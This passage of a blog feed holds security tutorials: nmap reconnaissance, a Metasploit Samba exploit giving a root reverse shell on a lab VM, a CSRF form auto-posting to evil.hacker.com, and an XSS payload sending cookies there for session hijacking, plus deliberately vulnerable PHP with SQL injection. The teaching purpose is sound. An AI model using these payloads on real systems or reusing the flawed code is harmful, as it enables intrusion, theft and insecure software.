root@kali:~# <b>nmap -sT 192.168.122.1 -p 22 --script=banner</b><br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:40 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00032s latency).<br />
PORT STATE SERVICE<br />
22/tcp open ssh<br />
<span style="color: red;">|_banner: SSH-2.0-OpenSSH_6.4</span><br />
MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)<br />
<br />
root@kali:~# <b>nmap -sT 192.168.122.73 -p 21 --script=banner</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:42 IST<br />
Nmap scan report for 192.168.122.73<br />
Host is up (0.00061s latency).<br />
PORT STATE SERVICE<br />
21/tcp open ftp<br />
<span style="color: red;">|_banner: 220 (vsFTPd 2.3.4)</span><br />
<br />
<br />
5) <span style="color: blue;">Service Identification</span> (using probe-response analysis)<br />
root@kali:~# <b>nmap -sV -p 80 192.168.122.1</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:44 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00059s latency).<br />
PORT STATE SERVICE VERSION<br />
80/tcp open http <span style="color: red;">Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16)</span><br />
<br />
<br />
6) <span style="color: blue;">O.S. identification.</span><br />
root@kali:~# <b>nmap -O 192.168.122.1</b><br />
Device type: general purpose<br />
<span style="color: red;">Running: Linux 2.6.X|3.X</span><br />
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3<br />
<span style="color: red;">OS details: Linux 2.6.32 - 3.10</span><br />
Network Distance: 1 hop<br />
<br />
<br />
7) <span style="color: blue;">Identify Filtering on ports.</span> A filtered port means that the port is open but our access is being blocked by a firewall.<br />
root@kali:~# <b>nmap -sA 192.168.122.1 -p 22</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-14 10:30 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00038s latency).<br />
PORT STATE SERVICE<br />
<span style="color: red;">22/tcp filtered ssh</span><br />
<br />
<br />
root@kali:~# <b>nmap -sA 192.168.100.1 -p 22</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-14 10:37 IST<br />
Nmap scan report for 192.168.100.1<br />
Host is up (0.00092s latency).<br />
PORT STATE SERVICE<br />
<span style="color: red;">22/tcp unfiltered ssh</span><br />
<br />
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-91015597431431831572015-06-13T15:11:00.001+05:302015-06-20T22:01:44.495+05:30Metasploitable2: Hack Samba Server and get root access<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
The Metasploitable virtual machine is an intentionally vulnerable
version of Ubuntu Linux designed for testing security tools and
demonstrating common vulnerabilities. This virtual machine is compatible
with VMWare, VirtualBox, and other common virtualization platforms.<br />
<br />
We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. <span style="color: black;">For Instructions on how to install Metasploitable 2 Virtual Machine in KVM</span>, refer to this <a href="http://linux-hacking-guide.blogspot.in/2015/05/convert-vmware-virtual-machine-to-kvm.html" target="_blank">post.</a><br />
<br />
In a <a href="http://linux-hacking-guide.blogspot.in/2015/05/metasploitable2-vulnerability-scanning.html" target="_blank">previous post </a>,
we carried out a Vulnerability Scan of the 'Metasploitable 2'
virtual machine using OpenVAS in Kali LInux. <br />
<br />
In this post, we will hack Samba Server using Metasploit in Kali Linux. <br />
<br />
We have the following scenario:<br />
<br />
Metasploitable2 IP Address: 192.168.122.73<br />
Kali Linux IP Address: 192.168.122.115<br />
<br />
Perform the following steps on the Kali Linux machine:<br />
<br />
1) We perform a port scan on the Metasploitable machine and see that the samba port is open.<br />
root@kali:~# <b>nmap 192.168.122.73</b><br />
Nmap scan report for 192.168.122.73<br />
Host is up (0.00080s latency).<br />
Not shown: 977 closed ports<br />
PORT STATE SERVICE<br />
21/tcp open ftp<br />
22/tcp open ssh<br />
23/tcp open telnet<br />
25/tcp open smtp<br />
53/tcp open domain<br />
80/tcp open http<br />
111/tcp open rpcbind<br />
<span style="color: red;">139/tcp open netbios-ssn</span><br />
445/tcp open microsoft-ds<br />
<br />
<br />
2) Start metasploit <br />
root@kali:~# <b>msfconsole</b><br />
msf ><b> search samba</b><br />
<span style="color: red;">exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution</span><br />
<br />
<br />
msf > <b>use exploit/multi/samba/usermap_script</b> <br />
<br />
msf exploit(usermap_script) > <b>show options</b><br />
<br />
Module options (exploit/multi/samba/usermap_script):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST yes The target address<br />
RPORT 139 yes The target port<br />
<br />
<br />
msf exploit(usermap_script) > <b>set RHOST 192.168.122.73</b><br />
RHOST => 192.168.122.73<br />
<br />
<br />
msf exploit(usermap_script) > <b>show payloads</b><br />
<b><br /></b>
<br />
We will select a payload in which the remote host connects back to our (attacker) system.<br />
<br />
msf exploit(usermap_script) > <b>set PAYLOAD cmd/unix/reverse</b><br />
PAYLOAD => cmd/unix/reverse<br />
<br />
msf exploit(usermap_script) > <b>show options</b><br />
<br />
Module options (exploit/multi/samba/usermap_script):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST 192.168.122.73 yes The target address<br />
RPORT 139 yes The target port<br />
<br />
<br />
Payload options (cmd/unix/reverse):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
LHOST 192.168.122.115 yes The listen address<br />
LPORT 4444 yes The listen port<br />
<br />
<br />
Many corporate environments restrict outbound ports using a firewall. So we will use port 443, which is reserved for SSL traffic, and outbound is generally allowed. <br />
<br />
msf exploit(usermap_script) > <b>set LPORT 443</b><br />
LPORT => 443<br />
msf exploit(usermap_script) > <b>exploit</b><br />
<br />
[*] Started reverse double handler<br />
[*] Accepted the first client connection...<br />
[*] Accepted the second client connection...<br />
[*] Command: echo ol88NmbSO30AG07L;<br />
[*] Writing to socket A<br />
[*] Writing to socket B<br />
[*] Reading from sockets...<br />
[*] Reading from socket B<br />
[*] B: "ol88NmbSO30AG07L\r\n"<br />
[*] Matching...<br />
[*] A is input...<br />
[*] Command shell session 2 opened<span style="color: red;"> (192.168.122.115:443 -> 192.168.122.73:46632)</span> at 2015-06-13 14:35:45 +0530<br />
<br />
<b>whoami</b><br />
root<br />
<br />
<br />
We now have root access on the target machine<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2tag:blogger.com,1999:blog-1164086323266606043.post-4942329410184968592015-06-12T17:35:00.000+05:302015-06-20T23:05:28.375+05:30Cross-Site Request Forgery Attack: Example Application<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In Cross-site request forgery (CSRF) attack, the attacker creates an innocuous-looking website that causes the user's browser to submit a request directly to the vulnerable application to perform some unintended action.<br />
<br />
In this tutorial, we develop a web application which has a CSRF vulnerability.
When a user logs into the application, a session is created for him.
The attacker creates a malicious URL to exploit the CSRF vulnerability. When the user clicks on the malicious link, the script performs a privileged operation on the vulnerable web application.<br />
<br />
<br />
Victim Web Server Name: <span style="color: red;">meru.mycompany.com</span><br />
Attacker Web Server : <span style="color: red;">evil.hacker.com </span><br />
<br />
<br />
1) The user logs in to the application by viewing the URL <span style="color: red;">http://meru.mycompany.com/login.html</span>.
Enters username and password. On successful authentication, a session is
created for the user. And the user is redirected to the URL <span style="color: red;">http://meru.mycompany.com/transfer.php</span>. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfBffvaGIDe6XcJ9QzkD-Ayp7U5sVcGiywOaUhdjl_7Hpch01QhyphenhyphenRtbIyVwAMckwVoV3mBU8hWUQTj8h-I4b2coJhMeMYg6Jk7c0qWQYqm7od73_pJcZ3sdHZKRDGhe9ahJWUbGaaO_aV3/s1600/Screenshot+from+2015-06-09+23%253A02%253A47.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfBffvaGIDe6XcJ9QzkD-Ayp7U5sVcGiywOaUhdjl_7Hpch01QhyphenhyphenRtbIyVwAMckwVoV3mBU8hWUQTj8h-I4b2coJhMeMYg6Jk7c0qWQYqm7od73_pJcZ3sdHZKRDGhe9ahJWUbGaaO_aV3/s400/Screenshot+from+2015-06-09+23%253A02%253A47.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
2) On the page '<span style="color: red;">transfer.php</span>' , the user specifies the account no. of the recipient and the amount to transfer. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-B6FNmfmbIp1_YDnvjt_cJJfSsM7jol6KTYfHTK6FAzRcuve-UMiZmozs_h-skGAFtcwHZCDmERDFy4eJqyJ2wwUGYTqovWLhoAQDMV5kO7Q8J07hBaGUZWYKZ7kOVgW1kT3iIm_MmwC1/s1600/Screenshot+from+2015-06-12+11%253A47%253A21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-B6FNmfmbIp1_YDnvjt_cJJfSsM7jol6KTYfHTK6FAzRcuve-UMiZmozs_h-skGAFtcwHZCDmERDFy4eJqyJ2wwUGYTqovWLhoAQDMV5kO7Q8J07hBaGUZWYKZ7kOVgW1kT3iIm_MmwC1/s400/Screenshot+from+2015-06-12+11%253A47%253A21.png" width="400" /></a></div>
<br />
The page '<span style="color: red;">transfer.php</span>' contains the following code:<br />
<br />
<?php<br />
<span style="color: blue;">session_start();</span><br />
?><br />
<html><br />
<body><br />
<?php<br />
<span style="color: blue;">if(!isset($_SESSION['loginid'])){</span><br />
echo "please login";<br />
}else{<br />
?><br />
<h2>Enter Transaction details</h2><span style="color: blue;"> </span><br />
<span style="color: blue;"><form action="perform.php" method="post"></span><br />
<label>To account no:</label><br />
<<span style="color: blue;">input type="text" name="daccount" /> <span style="color: #444444;"><br/></span></span><br />
<label>Transfer Amount:</label><span style="color: blue;"> </span><br />
<span style="color: blue;"><input type="text" name="amount" /> <span style="color: #444444;"><br/></span></span><br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
<?php<br />
}<br />
?><br />
</body><br />
</html><br />
<br />
<br />
<span style="color: black;">We can see that the above code is vulnerable to CSRF attack because of the following reasons:</span><br />
<span style="color: black;">a) The application relies solely on HTTP cookies for tracking sessions.</span><br />
<span style="color: black;">b) The attacker can determine all the parameters required to perform the action.</span><br />
<span style="color: black;"><br /></span>
<span style="color: red;"><span style="color: black;">3) The attacker constructs a web page '</span></span><span style="color: red;"><span style="color: black;"><span style="color: red;">http://evil.hacker.com/attacker.php</span>' that makes a cross-domain request to the vulnerable application containing everything needed to perform the privileged action. As shown below: </span></span>
<br />
<br />
<span style="color: #444444;"><html></span><br />
<span style="color: #444444;"><body></span><br />
<span style="color: blue;"><form action="http://meru.mycompany.com/perform.php" method="post"></span><br />
<span style="color: blue;"><span style="background-color: white;"><input type="hidden" name="daccount" value="1050" /> <br/></span></span><br />
<span style="color: blue;"><span style="background-color: white;"><input type="hidden" name="amount" value="1000" /> <br/></span></span><br />
<span style="color: #444444;"></form></span><br />
<span style="color: blue;"><script>document.forms[0].submit();</span><br />
<span style="color: #444444;"></script></span><br />
<span style="color: #444444;"></body></span><br />
<span style="color: #444444;"></html></span><br />
<br />
<br />
This attack places all the parameters to the request into hidden form fields and contains a script to automatically submit the form.<br />
<br />
4) The attacker puts this page on his web server and tricks the user into clicking on the link <span style="color: red;">http://evil.hacker.com/attacker.php<span style="color: black;">, while the user is already logged-in to the vulnerable application.</span></span><br />
<br />
When the user's browser submits the form, it automatically adds the user's cookies for the target domain, and the vulnerable application processes the request in the usual way and money is transferred to the attacker's account.<br />
<br />
<br />
The attacker can also use an <i>iframe</i> to launch the attack, as shown below. The advantage of using an iframe is that the output from the victim server is hidden to the user and the user will not come to know that he has been attacked.<br />
<br /><span style="color: red;">iframe_attack.php</span> <br />
<html><br />
<body><br />
<iframe height="0" width="0" src='<span style="color: red;">http://evil.hacker.com/attacker.php</span>'></iframe><br />
</body><br />
</html><br />
<br />
In the above case, the user has to click on <span style="color: red;">http://evil.hacker.com/iframe_attack.php.</span><br />
<br />
<br />
5) The source code for the application is given below:<br />
<br />
<span style="color: red;">login.php</span><br />
<?php<br />
<br />
if(!isset($_SESSION['loginid'])){<br />
if(isset($_POST['submit'])){<br />
$loginid = $_POST['loginid'];<br />
$passwd = $_POST['passwd'];<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
die('error connecting to server' . $conn->connect_error);<br />
}<br />
<br />
<br />
$sql = "select loginid,passwd,custname from customer where loginid = '$loginid' and passwd = '$passwd'";<br />
<br />
$result = $conn->query($sql);<br />
<br />
if ($result->num_rows == 1){<br />
$row = $result->fetch_assoc();<br />
$custname = $row['custname'];<br />
<br />
session_start();<br />
$_SESSION['loginid'] = $loginid;<br />
$_SESSION['custname'] = $custname;<br />
<br />
header('Location: transfer.php');<br />
}<br />
$error_msg="invalid username or password.\n";<br />
<br />
$conn->close();<br />
}<br />
}<br />
?><br />
<br />
<br />
<html><br />
<head><br />
<title>Welcome to mybank</title><br />
</head><br />
<br />
<body><br />
<h2>Enter login details</h2><br />
<?php<br />
if(! empty($error_msg)){<br />
echo "<strong>" . $error_msg . "</strong><br/>";<br />
}<br />
?><br />
<br />
<form action="login.php" method="post"><br />
<br />
<label>Login id:</label><br />
<input type="text" name="loginid" /> <br/><br />
<br />
<label>Password:</label><br />
<input type="text" name="passwd" /> <br/><br />
<br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
<span style="color: red;">perform.php</span><br />
<?php<br />
session_start();<br />
if(!isset($_SESSION['loginid'])){<br />
echo "please login";<br />
}else{<br />
<br />
$daccount = $_POST['daccount'];<br />
$amount = $_POST['amount'];<br />
$loginid = $_SESSION['loginid'];<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
die('error connecting to server' . $conn->connect_error);<br />
}<br />
<br />
<br />
$sql1 = "select * from customer where loginid = '$loginid'";<br />
$result = $conn->query($sql1);<br />
<br />
if($result->num_rows > 0){<br />
$row = $result->fetch_assoc();<br />
$sbalance = $row['balance'];<br />
$sbalance = $sbalance - $amount;<br />
echo $sbalance;<br />
}else{<br />
echo "0 results";<br />
}<br />
<br />
$sql1 = "select * from customer where accountno = '$daccount'";<br />
$result = $conn->query($sql1);<br />
if($result->num_rows > 0){<br />
$row = $result->fetch_assoc();<br />
$dbalance = $row['balance'];<br />
$dbalance = $dbalance + $amount;<br />
echo $dbalance;<br />
}else{<br />
echo "0 results";<br />
}<br />
<br />
$sql1 = "update customer set balance = $sbalance where loginid = '$loginid'";<br />
if($conn->query($sql1) == TRUE){<br />
echo "inserted successfully";<br />
}<br />
else{<br />
echo "error quering database" . $conn->error;<br />
}<br />
$sql1 = "update customer set balance = $dbalance where accountno = '$daccount'";<br />
if($conn->query($sql1) == TRUE){<br />
echo "inserted successfully";<br />
}<br />
else{<br />
echo "error quering database" . $conn->error;<br />
}<br />
<br />
$conn->close();<br />
<br />
}<br />
?><br />
<br />
<br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-10490932811759880142015-06-12T10:30:00.000+05:302015-06-20T23:05:28.361+05:30Session Hijacking using Stored XSS: Example Application<div dir="ltr" style="text-align: left;" trbidi="on">
Session hijacking occurs when an attacker captures a session token
and injects it into their own browser to gain access to the victim's
authenticated session.<br />
<br />
There are some limitations of session hijacking attacks:<br />
1) Stealing cookies is useless if the target is using <span style="color: red;">https://</span> for browsing.<br />
2) Most cookies expire when the target logs out of a session. This also logs the attacker out of the session.<br />
3) Many websites do not support parallel logins, which negates the use of a stolen cookie.<br />
<br />
In this tutorial, we will see how to steal session cookie using Stored Cross-Site Scripting Attack.<br />
<br />
Stored cross-site scripting arises when data submitted by one user is stored in the application (typically in a database) and then is displayed to other users without being filtered appropriately.<br />
<br />
Attacks against Stored XSS vulnerabilities typically involve at least two requests to the application.<br />
1) In the first, the attacker posts some crafted data containing malicious code that the application stores.<br />
2) In the second, a victim views a page containing the attacker's data, and the malicious script is executed in the victim's browser. <br /><br />
We
develop a web application which has a stored XSS vulnerability. The attacker logs in to the application and stores a malicious script in her profile. When the victim logs into the application, and views the attacker's profile, the malicious script gets executed in the victim's browser which sends the victim's session token to the attacker. <br />
<br />
<br />
Web Server Name: <span style="color: red;">meru.mycompany.com</span><br />
Attacker Machine : <span style="color: red;">evil.hacker.com </span><br />
<br />
<br />
1) The attacker logs in to the application by viewing the URL <span style="color: blue;"><span style="background-color: white;">http://meru.mycompany.com/login.php.</span></span> <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe4H-h3hdiUfi1jCydzWbQ8l28OcWP1ScV55cTG6OixGhviBvDalogU8IYrXsla6LsaI3jmSIUuQTiBNi-mkXFSKkElzQvZ63TVh6mM0q54-Y_okX2sJtX_BxGNCdZCS_m7WgVHd350dTR/s1600/Screenshot+from+2015-06-11+18%253A35%253A20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe4H-h3hdiUfi1jCydzWbQ8l28OcWP1ScV55cTG6OixGhviBvDalogU8IYrXsla6LsaI3jmSIUuQTiBNi-mkXFSKkElzQvZ63TVh6mM0q54-Y_okX2sJtX_BxGNCdZCS_m7WgVHd350dTR/s400/Screenshot+from+2015-06-11+18%253A35%253A20.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<br />
<br /><br />
2) The attacker accesses the page '<span style="color: blue;">http://meru.mycompany.com/edit_cust.php</span>' and enters the following Javascript in the <span style="color: blue;">Address</span> field. <br />
<br />
<span style="color: red;"><a href=# onclick=\"document.location=\'http://evil.hacker.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Address</a></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhkKMRP_KhtMVC1Q0ekaDe_u0l8tFGVN65U4cRheqBI6Uwiff1uGGdpE-Chi8I3tPo0mEH7iErdLbQM3aYF5fvgi-2e_tkJCkWsjhEgtbW9gcv8WFNkqseCgORg85QE306vNHh8Twghzit/s1600/Screenshot+from+2015-06-11+18%253A23%253A23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhkKMRP_KhtMVC1Q0ekaDe_u0l8tFGVN65U4cRheqBI6Uwiff1uGGdpE-Chi8I3tPo0mEH7iErdLbQM3aYF5fvgi-2e_tkJCkWsjhEgtbW9gcv8WFNkqseCgORg85QE306vNHh8Twghzit/s400/Screenshot+from+2015-06-11+18%253A23%253A23.png" width="400" /></a></div>
The attacker logs out of the application. And silently waits for the victim to log in and view her profile. <br />
<br />
<br />
3) The victim logs in to the application on the URL <span style="color: blue;"><span style="background-color: white;">http://meru.mycompany.com/login.php.</span></span> And views customer profiles on the page '<span style="color: blue;"><span style="background-color: white;">http://meru.mycompany.com/</span>list_cust.php</span>'. When the victim clicks on the link <span style="color: red;"><u>My Address</u> </span>, a request is sent to '<span style="color: blue;">evil.hacker.com'</span> containing the user's session token.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2ixznytdQD7Y_tWl3rlY0__K_ONFu2DONlsUcAOCT0ONfGo4KZ1ngyaSUaHl_Iipgq89XjLF1zUoBT9ZqN66RGOZi7eFrMDgge6JY_9FwROI68J7kDlrrgUMWMQSte_ijHSs00Qb9-pTE/s1600/Screenshot+from+2015-06-11+18%253A24%253A18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2ixznytdQD7Y_tWl3rlY0__K_ONFu2DONlsUcAOCT0ONfGo4KZ1ngyaSUaHl_Iipgq89XjLF1zUoBT9ZqN66RGOZi7eFrMDgge6JY_9FwROI68J7kDlrrgUMWMQSte_ijHSs00Qb9-pTE/s400/Screenshot+from+2015-06-11+18%253A24%253A18.png" width="400" /></a></div>
<br />
This code causes the user's browser to make a request to
'evil.hacker.com'. The request contains the user's session token for the
application. <br />
<br />
<br />
<br />
5) The attacker on 'evil.hacker.com' runs '<span style="color: red;">Wireshark</span>' and captures the session token as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhevH5WezVsLQZ9buWiY5bLJWxrAx71D21YXgeubBFlR7zOlqWr6fOwi6Kr1hqcmAFHdEKbcuICXoTfplTI6qmh-HwSRAn8jfeKYZQQjKX9tyndXU_cf6oRiEKyalUuvF2k9_1ESnCCybGq/s1600/Screenshot+from+2015-06-11+14%253A04%253A01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhevH5WezVsLQZ9buWiY5bLJWxrAx71D21YXgeubBFlR7zOlqWr6fOwi6Kr1hqcmAFHdEKbcuICXoTfplTI6qmh-HwSRAn8jfeKYZQQjKX9tyndXU_cf6oRiEKyalUuvF2k9_1ESnCCybGq/s640/Screenshot+from+2015-06-11+14%253A04%253A01.png" width="640" /></a></div>
<br />
<br />
6) Now the attacker has to insert this session token in a cookie in his
browser and hijack the user session. The attacker will perform the following steps:<br />
<br />
6.1) Open Firefox Web Browser. Install <span style="color: red;">Grease Monkey</span> Firefox extension<br />
<br />
<a href="https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/" rel="nofollow">https://addons.mozilla.org/en-US/firefox/addon/greasemonkey</a><a href="http://dustint.com/post/12/cookie-injection-using-greasemonkey" rel="nofollow"><br /></a><br />
<br />
6.2) Install <span style="color: red;">Cookie Injector</span> script in Grease Monkey.<br />
<br />
<a href="http://userscripts-mirror.org/scripts/show/119798" rel="nofollow">http://userscripts-mirror.org/scripts/show/119798</a><br />
<br />
<a href="http://dustint.com/post/12/cookie-injection-using-greasemonkey" rel="nofollow">http://dustint.com/post/12/cookie-injection-using-greasemonkey</a><br />
<br />
6.1) Copy the session token from 'Wireshark' output. Right click on <b>Request URI</b>. Select <b>Copy</b> -> <b>Bytes</b> -> <b>Printable Text Only</b>. Then paste into 'gedit' text editor as shown below:<br />
<br />
<span style="color: red;">/xss.php?c=PHPSESSID%3Dnef6vmd3ag8h7lo50m8190iee5</span><br />
<br />
6.2) Edit the copied text as shown below.<br />
<br />
<span style="color: red;">Cookie: PHPSESSID=nef6vmd3ag8h7lo50m8190iee5</span><br />
<br />
6.3) Copy the above line.<br />
<br />
6.4) Start Firefox web browser. Press <b>Alt+C</b> to open the Cookie Injector dialog. Paste the above copied line and click <b>OK</b> as shown below.<br />
<br />
<img class="CSS_LIGHTBOX_SCALED_IMAGE_IMG" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgrPblfz2tAxQflFOTWHan1jo6iqUSbICZLl-jd9d-Mo_bKhxoPmkojoOiMTP14uO5T6kZWUgC4ZiFpwTkTraJoSgIt8WljQiGtIN76fmJYCszOM9bTratS4OEQgDEzOkg-Obt_da7CBMO/s1600/Screenshot+from+2015-06-11+14%253A06%253A08.png" style="height: 522px; width: 696px;" /><br />
<br />
<br />
<br />
<br />
6.5) The session has been hijacked. The attacker accesses the URL <span style="color: red;">http://meru.mycompany.com/transfer.php</span> and transfers money from the victim's account.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIAR6ciMW0NYi6r3D5wkVnUrfHOqAF0rhSzma-yeTCWwjvJIZYNxqneEU33HofNzNPslz26vX-Zh-NDVwv9IRehnqnFzmHDjxn70ohKevS0lXkIV1HtnzTiIozyFGNZ_ZPJZeFXm7fzGEG/s1600/Screenshot+from+2015-06-11+14%253A07%253A28.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIAR6ciMW0NYi6r3D5wkVnUrfHOqAF0rhSzma-yeTCWwjvJIZYNxqneEU33HofNzNPslz26vX-Zh-NDVwv9IRehnqnFzmHDjxn70ohKevS0lXkIV1HtnzTiIozyFGNZ_ZPJZeFXm7fzGEG/s640/Screenshot+from+2015-06-11+14%253A07%253A28.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
Source Code for the Application:<br />
<br />
<span style="color: red;">login.php</span><br />
<?php<br />
<br />
if(!isset($_SESSION['loginid'])){<br />
if(isset($_POST['submit'])){<br />
$loginid = $_POST['loginid'];<br />
$passwd = $_POST['passwd'];<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
die('error connecting to server' . $conn->connect_error);<br />
}<br />
<br />
<br />
$sql = "select loginid,passwd,custname from customer where loginid = '$loginid' and passwd = '$passwd'";<br />
<br />
$result = $conn->query($sql);<br />
<br />
if ($result->num_rows == 1){<br />
$row = $result->fetch_assoc();<br />
$custname = $row['custname'];<br />
<br />
session_start();<br />
$_SESSION['loginid'] = $loginid;<br />
$_SESSION['custname'] = $custname;<br />
<br />
header('Location: search.php');<br />
}<br />
$error_msg="invalid username or password.\n";<br />
<br />
$conn->close();<br />
}<br />
}<br />
?><br />
<br />
<br />
<html><br />
<head><br />
<title>Welcome to mybank</title><br />
</head><br />
<br />
<body><br />
<h2>Enter login details</h2><br />
<?php<br />
if(! empty($error_msg)){<br />
echo "<strong>" . $error_msg . "</strong><br/>";<br />
}<br />
?><br />
<br />
<form action="login.php" method="post"><br />
<br />
<label>Login id:</label><br />
<input type="text" name="loginid" /> <br/><br />
<br />
<label>Password:</label><br />
<input type="text" name="passwd" /> <br/><br />
<br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
<span style="color: red;">edit_cust.php</span><br />
<br />
<html><br /><head><br /><title>Welcome to mybank</title><br /></head><br /><br /><body><br /><?php<br />session_start();<br />if(!isset($_SESSION['loginid'])){<br /> echo 'Please login';<br />} else{<br /><br />if(isset($_POST['submit'])){<br /><br />$loginid = $_POST['loginid'];<br />$passwd = $_POST['passwd'];<br />$custname = $_POST['custname'];<br />$accountno = $_POST['accountno'];<br />$balance = $_POST['balance'];<br />$address = $_POST['address'];<br />$mobile = $_POST['mobile'];<br /><br />$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br /> if($conn->connect_error){<br /> die('error connecting to server' . $conn->connect_error);<br /> }<br /><br />echo $loginid;<br /><br />$sql = "update customer set passwd = '$passwd', custname = '$custname', accountno = '$accountno', balance = '$balance', address = '$address', mobile = '$mobile' where loginid = '" . $loginid . "'";<br /><br /><br />if($conn->query($sql) === TRUE){<br /> echo "inserted successfully";<br /> header('Location: index.php');<br />}<br />else{<br /> echo "error quering database" . $conn->error;<br />}<br /><br />$conn->close();<br /><br />}else{<br /><br />$loginid = $_SESSION['loginid'];<br /><br />$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />if($conn->connect_error){<br /> die("connect error" . $conn->connect_error);<br />}<br /><br />$sql = "select * from customer where loginid = '" . $loginid . "'";<br />$result = $conn->query($sql);<br /><br />if($result->num_rows > 0){<br /> $row = $result->fetch_assoc();<br /> $passwd = $row['passwd'];<br /> $custname = $row['custname'];<br /> $accountno = $row['accountno'];<br /> $balance = $row['balance'];<br /> $address = $row['address'];<br /> $mobile = $row['mobile'];<br />}<br />?><br /><br /><br /><br /><h2>Enter customer details</h2><br /><br /><form action="edit_cust.php" method="post"><br /><br /><label>Login id:</label><br /><input type="text" name="loginid" value="<?php echo $loginid;?>" /> <br/> <br /><br /><label>Password:</label><br /><input type="text" name="passwd" value="<?php echo $passwd;?>" /> <br/> <br /><br /><label>Customer name:</label><br /><input type="text" name="custname" value="<?php echo $custname;?>" /> <br/> <br /><br /><label>Account No:</label><br /><input type="text" name="accountno" value="<?php echo $accountno;?>" /> <br/> <br /><br /><label>Balance:</label><br /><input type="text" name="balance" value="<?php echo $balance;?>" /> <br/> <br /><br /><label>Address:</label><br /><input type="text" name="address" value="<?php echo $address;?>" /> <br/> <br /><br /><label>Mobile No.:</label><br /><input type="text" name="mobile" value="<?php echo $mobile;?>" /> <br/> <br /><br /><input type="submit" name="submit" value="submit"/><br /></form><br /><br /><br /><?php<br />}<br />}<br />?><br /><br /></body><br /></html><br />
<br />
<br />
<span style="color: red;">list_cust.php</span><br />
